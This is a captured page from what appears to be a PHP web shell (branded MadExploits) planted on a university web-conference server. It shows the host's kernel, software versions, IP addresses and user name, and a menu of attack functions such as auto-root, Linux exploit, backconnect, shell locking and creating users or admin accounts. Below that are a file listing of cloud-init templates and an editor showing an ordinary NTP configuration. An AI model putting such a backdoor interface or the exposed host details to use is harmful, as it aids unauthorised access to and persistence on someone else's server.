Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.225.55.42
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
cloud /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
chef_client.rb.tmpl
1.63
KB
-rw-r--r--
chrony.conf.almalinux.tmpl
1.25
KB
-rw-r--r--
chrony.conf.alpine.tmpl
1.18
KB
-rw-r--r--
chrony.conf.centos.tmpl
1.25
KB
-rw-r--r--
chrony.conf.cloudlinux.tmpl
1.25
KB
-rw-r--r--
chrony.conf.cos.tmpl
873
B
-rw-r--r--
chrony.conf.debian.tmpl
1.18
KB
-rw-r--r--
chrony.conf.fedora.tmpl
1.34
KB
-rw-r--r--
chrony.conf.freebsd.tmpl
13.98
KB
-rw-r--r--
chrony.conf.opensuse-leap.tmpl
1.06
KB
-rw-r--r--
chrony.conf.opensuse-microos.t...
1.06
KB
-rw-r--r--
chrony.conf.opensuse-tumblewee...
1.06
KB
-rw-r--r--
chrony.conf.opensuse.tmpl
1.06
KB
-rw-r--r--
chrony.conf.photon.tmpl
1.34
KB
-rw-r--r--
chrony.conf.rhel.tmpl
1.25
KB
-rw-r--r--
chrony.conf.rocky.tmpl
1.25
KB
-rw-r--r--
chrony.conf.sle-micro.tmpl
1.06
KB
-rw-r--r--
chrony.conf.sle_hpc.tmpl
1.06
KB
-rw-r--r--
chrony.conf.sles.tmpl
1.06
KB
-rw-r--r--
chrony.conf.ubuntu.tmpl
1.35
KB
-rw-r--r--
host.mariner.tmpl
898
B
-rw-r--r--
hosts.alpine.tmpl
893
B
-rw-r--r--
hosts.aosc.tmpl
931
B
-rw-r--r--
hosts.arch.tmpl
841
B
-rw-r--r--
hosts.azurelinux.tmpl
882
B
-rw-r--r--
hosts.debian.tmpl
845
B
-rw-r--r--
hosts.freebsd.tmpl
911
B
-rw-r--r--
hosts.gentoo.tmpl
910
B
-rw-r--r--
hosts.mariner.tmpl
876
B
-rw-r--r--
hosts.photon.tmpl
874
B
-rw-r--r--
hosts.redhat.tmpl
912
B
-rw-r--r--
hosts.suse.tmpl
1.04
KB
-rw-r--r--
ntp.conf.almalinux.tmpl
1.86
KB
-rw-r--r--
ntp.conf.alpine.tmpl
255
B
-rw-r--r--
ntp.conf.cloudlinux.tmpl
1.86
KB
-rw-r--r--
ntp.conf.debian.tmpl
2.15
KB
-rw-r--r--
ntp.conf.fedora.tmpl
2.08
KB
-rw-r--r--
ntp.conf.freebsd.tmpl
4.13
KB
-rw-r--r--
ntp.conf.opensuse.tmpl
2.74
KB
-rw-r--r--
ntp.conf.photon.tmpl
1.86
KB
-rw-r--r--
ntp.conf.rhel.tmpl
1.86
KB
-rw-r--r--
ntp.conf.rocky.tmpl
1.86
KB
-rw-r--r--
ntp.conf.sles.tmpl
2.74
KB
-rw-r--r--
ntp.conf.ubuntu.tmpl
2.5
KB
-rw-r--r--
ntpd.conf.openbsd.tmpl
543
B
-rw-r--r--
resolv.conf.tmpl
921
B
-rw-r--r--
sources.list.debian.deb822.tmp...
1.42
KB
-rw-r--r--
sources.list.debian.tmpl
1.41
KB
-rw-r--r--
sources.list.ubuntu.deb822.tmp...
2.92
KB
-rw-r--r--
sources.list.ubuntu.tmpl
2.79
KB
-rw-r--r--
systemd.resolved.conf.tmpl
504
B
-rw-r--r--
timesyncd.conf.tmpl
203
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ntp.conf.debian.tmpl
## template:jinja # /etc/ntp.conf, configuration for ntpd; see ntp.conf(5) for help driftfile /var/lib/ntp/ntp.drift # Enable this if you want statistics to be logged. #statsdir /var/log/ntpstats/ statistics loopstats peerstats clockstats filegen loopstats file loopstats type day enable filegen peerstats file peerstats type day enable filegen clockstats file clockstats type day enable # You do need to talk to an NTP server or two (or three). #server ntp.your-provider.example # pool.ntp.org maps to about 1000 low-stratum NTP servers. Your server will # pick a different set every time it starts up. Please consider joining the # pool: <http://www.pool.ntp.org/join.html> {% if pools %}# pools {% endif %} {% for pool in pools -%} pool {{pool}} iburst {% endfor %} {%- if servers %}# servers {% endif %} {% for server in servers -%} server {{server}} iburst {% endfor %} {% for peer in peers -%} peer {{peer}} {% endfor %} # Access control configuration; see /usr/share/doc/ntp-doc/html/accopt.html for # details. The web page <http://support.ntp.org/bin/view/Support/AccessRestrictions> # might also be helpful. # # Note that "restrict" applies to both servers and clients, so a configuration # that might be intended to block requests from certain clients could also end # up blocking replies from your own upstream servers. # By default, exchange time with everybody, but don't allow configuration. restrict -4 default kod notrap nomodify nopeer noquery limited restrict -6 default kod notrap nomodify nopeer noquery limited # Local users may interrogate the ntp server more closely. restrict 127.0.0.1 restrict ::1 # Needed for adding pool entries restrict source notrap nomodify noquery # Clients from this (example!) subnet have unlimited access, but only if # cryptographically authenticated. #restrict 192.168.123.0 mask 255.255.255.0 notrust # If you want to provide time to your local subnet, change the next line. # (Again, the address is an example only.) #broadcast 192.168.123.255 # If you want to listen to time broadcasts on your local subnet, de-comment the # next lines. Please do this only if you trust everybody on the network! #disable auth #broadcastclient
Close